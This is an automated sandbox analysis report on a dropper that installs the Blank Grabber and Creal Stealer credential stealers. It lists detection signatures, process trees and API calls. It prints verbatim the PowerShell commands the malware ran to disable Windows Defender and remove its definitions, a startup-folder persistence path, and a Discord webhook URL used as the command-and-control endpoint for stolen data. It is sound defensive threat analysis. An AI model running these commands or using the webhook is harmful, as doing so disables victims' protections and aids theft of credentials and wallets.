Windows Analysis Report
#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe

Overview

General Information

Sample name: #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe
renamed because original name is a hash value
Original sample name: .exe
Analysis ID: 1553259
MD5: 3ac5f99224a92851c80fe4178fff6002
SHA1: 20eae332be7470533009e2a0f28412463acb1f06
SHA256: a21cd46fbedb13199e3675a4ee14af9914547d237342fca0c8cd8022a7888363
Tags: exe, user-aachum
Infos:

Detection

Blank Grabber, Creal Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Blank Grabber
Yara detected Creal Stealer
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Check if machine is in data center or colocation facility
Drops PE files to the startup folder
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Modifies Windows Defender protection settings
Removes signatures from Windows Defender
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Tries to steal communication platform credentials (via file / registry access)
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect virtual machines (SGDT)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe (PID: 4976 cmdline: "C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe" MD5: 3AC5F99224A92851C80FE4178FFF6002)
    • Creal.exe (PID: 5676 cmdline: "C:\Users\user\Desktop\Creal.exe" MD5: 017603B860F67F7F65F724E519465926)
      • Creal.exe (PID: 2432 cmdline: "C:\Users\user\Desktop\Creal.exe" MD5: 017603B860F67F7F65F724E519465926)
        • cmd.exe (PID: 4904 cmdline: C:\Windows\system32\cmd.exe /c "curl ifconfig.me" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 3224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 5388 cmdline: curl ifconfig.me MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
    • Built.exe (PID: 2760 cmdline: "C:\Users\user\Desktop\Built.exe" MD5: 12E9F3CE18351EE539646C23CC862C5C)
      • Built.exe (PID: 2536 cmdline: "C:\Users\user\Desktop\Built.exe" MD5: 12E9F3CE18351EE539646C23CC862C5C)
        • cmd.exe (PID: 5424 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Built.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 1396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 6720 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Built.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 2332 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 2792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 1052 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
            • WmiPrvSE.exe (PID: 6552 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
          • MpCmdRun.exe (PID: 4932 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: B3676839B2EE96983F9ED735CD044159)
        • cmd.exe (PID: 1032 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 6236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tasklist.exe (PID: 6620 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
        • cmd.exe (PID: 6940 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 5200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WMIC.exe (PID: 1056 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
  • Creal.exe (PID: 4236 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe" MD5: 017603B860F67F7F65F724E519465926)
    • Creal.exe (PID: 2244 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe" MD5: 017603B860F67F7F65F724E519465926)
      • cmd.exe (PID: 1656 cmdline: C:\Windows\system32\cmd.exe /c "curl ifconfig.me" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • curl.exe (PID: 3164 cmdline: curl ifconfig.me MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
  • cleanup
{"C2 url": "https://discord.com/api/webhooks/1304534397680357396/jwWT3Q8Ovv9Vvgd-RNJrwcYvcpgO5pbMYyd8C4eotXdFUJqgeAOXJwz_fHbLjM5ITcpj"}
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\_MEI27602\rarreg.key | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |

Source | Rule | Description | Author | Strings
00000003.00000003.2109058666.00000124EBC34000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
00000019.00000002.3354239060.00000227B8F10000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_CrealStealer | Yara detected Creal Stealer | Joe Security |
00000003.00000003.2109058666.00000124EBC32000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
00000004.00000003.2126560706.000002D966CE3000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
00000005.00000002.2425561292.00000203E8210000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_CrealStealer | Yara detected Creal Stealer | Joe Security |

              System Summary

              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Built.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Built.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Built.exe" , ParentImage: C:\Users\user\Desktop\Built.exe, ParentProcessId: 2536, ParentProcessName: Built.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Built.exe'", ProcessId: 5424, ProcessName: cmd.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Built.exe" , ParentImage: C:\Users\user\Desktop\Built.exe, ParentProcessId: 2536, ParentProcessName: Built.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 2332, ProcessName: cmd.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Built.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Built.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Built.exe" , ParentImage: C:\Users\user\Desktop\Built.exe, ParentProcessId: 2536, ParentProcessName: Built.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Built.exe'", ProcessId: 5424, ProcessName: cmd.exe
              Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\Creal.exe, ProcessId: 2432, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
              Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\system32\cmd.exe /c "curl ifconfig.me", CommandLine: C:\Windows\system32\cmd.exe /c "curl ifconfig.me", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Creal.exe" , ParentImage: C:\Users\user\Desktop\Creal.exe, ParentProcessId: 2432, ParentProcessName: Creal.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "curl ifconfig.me", ProcessId: 4904, ProcessName: cmd.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Built.exe', CommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Built.exe', CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Built.exe'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5424, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Built.exe', ProcessId: 6720, ProcessName: powershell.exe
              Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
              2024-11-10T17:02:34.506611+0100 | 2022930 | 1 | A Network Trojan was detected | 52.149.20.212 | 443 | 192.168.2.6 | 49726 | TCP
              2024-11-10T17:03:13.264966+0100 | 2022930 | 1 | A Network Trojan was detected | 52.149.20.212 | 443 | 192.168.2.6 | 49956 | TCP

              AV Detection

              Source: Creal.exe.2432.5.memstrmin, Malware Configuration Extractor: Creal Stealer {"C2 url": "https://discord.com/api/webhooks/1304534397680357396/jwWT3Q8Ovv9Vvgd-RNJrwcYvcpgO5pbMYyd8C4eotXdFUJqgeAOXJwz_fHbLjM5ITcpj"}
              Source: Built.exe.2536.4.memstrmin, Malware Configuration Extractor: Blank Grabber {"C2 url": "https://discord.com/api/webhooks/1304534397680357396/jwWT3Q8Ovv9Vvgd-RNJrwcYvcpgO5pbMYyd8C4eotXdFUJqgeAOXJwz_fHbLjM5ITcpj"}
              Source: #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe, ReversingLabs: Detection: 31%
              Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.6% probability

              Location Tracking

              Source: unknown, DNS query: name: geolocation-db.com
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF6E190 CRYPTO_free,5_2_00007FFD8AF6E190
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF6E200 CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,5_2_00007FFD8AF6E200
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF21389 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,5_2_00007FFD8AF21389
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF3C080 CRYPTO_free,CRYPTO_memdup,5_2_00007FFD8AF3C080
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF22527 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,5_2_00007FFD8AF22527
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF420A0 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,5_2_00007FFD8AF420A0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF800A0 CRYPTO_free,CRYPTO_memdup,5_2_00007FFD8AF800A0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF2E0AD ERR_set_debug,CRYPTO_free,CRYPTO_strdup,ERR_new,5_2_00007FFD8AF2E0AD
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF780C0 CRYPTO_memdup,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_free,CRYPTO_free,CRYPTO_free,5_2_00007FFD8AF780C0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF21361 CRYPTO_malloc,EVP_PKEY_set_type,EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_CTX_free,ERR_pop_to_mark,CRYPTO_free,EVP_PKEY_free,5_2_00007FFD8AF21361
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF24100 CRYPTO_free,5_2_00007FFD8AF24100
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF219DD BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,BN_copy,BN_free,CRYPTO_free,CRYPTO_strdup,5_2_00007FFD8AF219DD
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF6E781 CRYPTO_free,CRYPTO_free,5_2_00007FFD8AF6E781
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF21401 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,5_2_00007FFD8AF21401
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF21F28 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_strdup,5_2_00007FFD8AF21F28
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF21CA3 CRYPTO_strdup,CRYPTO_free,5_2_00007FFD8AF21CA3
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF225F4 CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,memcpy,memcmp,memcmp,memcmp,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_clear_free,5_2_00007FFD8AF225F4
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF21F3C CRYPTO_malloc,ERR_new,ERR_set_debug,5_2_00007FFD8AF21F3C
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF22423 CRYPTO_zalloc,CRYPTO_zalloc,OBJ_nid2sn,EVP_get_digestbyname,OBJ_nid2sn,EVP_get_digestbyname,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,5_2_00007FFD8AF22423
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF64660 CRYPTO_malloc,memset,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,5_2_00007FFD8AF64660
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF2162C EVP_MD_CTX_new,ERR_new,ERR_set_debug,ERR_new,EVP_MD_get0_name,EVP_DigestSignInit_ex,ERR_new,ERR_set_debug,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,EVP_DigestSignUpdate,EVP_DigestSignFinal,CRYPTO_malloc,EVP_DigestSignFinal,ERR_new,ERR_new,EVP_DigestSign,ERR_new,CRYPTO_malloc,EVP_DigestSign,BUF_reverse,ERR_new,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,EVP_MD_CTX_free,5_2_00007FFD8AF2162C
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF626B0 ERR_new,ERR_set_debug,BN_num_bits,CRYPTO_malloc,ERR_new,ERR_set_debug,BN_bn2bin,ERR_new,ERR_set_debug,BN_clear_free,BN_clear_free,CRYPTO_clear_free,ERR_new,ERR_set_debug,BN_clear_free,BN_clear_free,BN_clear_free,5_2_00007FFD8AF626B0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF3A6D0 CRYPTO_free,CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,5_2_00007FFD8AF3A6D0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF2103C CRYPTO_malloc,COMP_expand_block,5_2_00007FFD8AF2103C
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF6E700 CRYPTO_free,5_2_00007FFD8AF6E700
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF2120D EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,memset,5_2_00007FFD8AF2120D
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF216A4 CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,5_2_00007FFD8AF216A4
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF21488 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,5_2_00007FFD8AF21488
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF285A0 CRYPTO_zalloc,CRYPTO_free,5_2_00007FFD8AF285A0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF405E0 X509_VERIFY_PARAM_free,CRYPTO_free_ex_data,BIO_pop,BIO_free,BIO_free_all,BIO_free_all,BUF_MEM_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,SCT_LIST_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_MD_CTX_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,ASYNC_WAIT_CTX_free,CRYPTO_free,OPENSSL_sk_free,CRYPTO_THREAD_lock_free,CRYPTO_free,5_2_00007FFD8AF405E0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF78620 CRYPTO_memcmp,5_2_00007FFD8AF78620
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF224CD CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,memcpy,5_2_00007FFD8AF224CD
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF21212 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,5_2_00007FFD8AF21212
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF86650 EVP_CIPHER_CTX_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,5_2_00007FFD8AF86650
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF213D9 OPENSSL_sk_new_null,ERR_new,ERR_set_debug,X509_new_ex,d2i_X509,CRYPTO_free,OPENSSL_sk_push,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_new,ERR_set_debug,X509_free,OPENSSL_sk_pop_free,5_2_00007FFD8AF213D9
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF21AC3 CRYPTO_THREAD_read_lock,CRYPTO_THREAD_unlock,5_2_00007FFD8AF21AC3
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF218B6 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,5_2_00007FFD8AF218B6
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF54490 CRYPTO_realloc,memcpy,ERR_new,ERR_set_debug,ERR_set_error,5_2_00007FFD8AF54490
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF226E4 BIO_s_file,BIO_new,ERR_new,ERR_set_debug,BIO_ctrl,ERR_new,ERR_set_debug,strncmp,ERR_new,ERR_set_debug,strncmp,CRYPTO_realloc,memcpy,CRYPTO_free,CRYPTO_free,CRYPTO_free,PEM_read_bio,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,BIO_free,5_2_00007FFD8AF226E4
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF21ACD ERR_new,ERR_set_debug,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,memcpy,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,memcpy,ERR_new,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,5_2_00007FFD8AF21ACD
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF34530 OPENSSL_sk_num,X509_STORE_CTX_new_ex,ERR_new,ERR_set_debug,ERR_set_error,OPENSSL_sk_value,X509_STORE_CTX_init,ERR_new,ERR_set_debug,ERR_set_error,X509_STORE_CTX_free,X509_STORE_CTX_set_flags,CRYPTO_THREAD_run_once,X509_STORE_CTX_set_ex_data,OPENSSL_sk_num,X509_STORE_CTX_set0_dane,X509_STORE_CTX_set_default,X509_VERIFY_PARAM_set1,X509_STORE_CTX_set_verify_cb,X509_verify_cert,X509_STORE_CTX_get_error,OPENSSL_sk_pop_free,X509_STORE_CTX_get0_chain,X509_STORE_CTX_get1_chain,ERR_new,ERR_set_debug,ERR_set_error,X509_VERIFY_PARAM_move_peername,X509_STORE_CTX_free,5_2_00007FFD8AF34530
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF96550 CRYPTO_memcmp,5_2_00007FFD8AF96550
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF9BB70 OPENSSL_sk_new_null,ERR_new,ERR_set_debug,X509_new_ex,d2i_X509,CRYPTO_free,CRYPTO_memcmp,ERR_new,ERR_set_debug,OPENSSL_sk_push,OPENSSL_sk_num,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,X509_free,OPENSSL_sk_pop_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_value,X509_get0_pubkey,ERR_new,ERR_set_debug,X509_free,OPENSSL_sk_shift,OPENSSL_sk_pop_free,ERR_new,ERR_set_debug,5_2_00007FFD8AF9BB70
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF45B90 CRYPTO_zalloc,CRYPTO_zalloc,OBJ_nid2sn,EVP_get_digestbyname,OBJ_nid2sn,EVP_get_digestbyname,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,5_2_00007FFD8AF45B90
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF81B9F CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,5_2_00007FFD8AF81B9F
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF4DBA0 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,_time64,CRYPTO_THREAD_lock_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_new_ex_data,CRYPTO_THREAD_lock_free,CRYPTO_free,5_2_00007FFD8AF4DBA0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF35BB0 OPENSSL_sk_new,COMP_get_type,CRYPTO_malloc,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_sort,5_2_00007FFD8AF35BB0
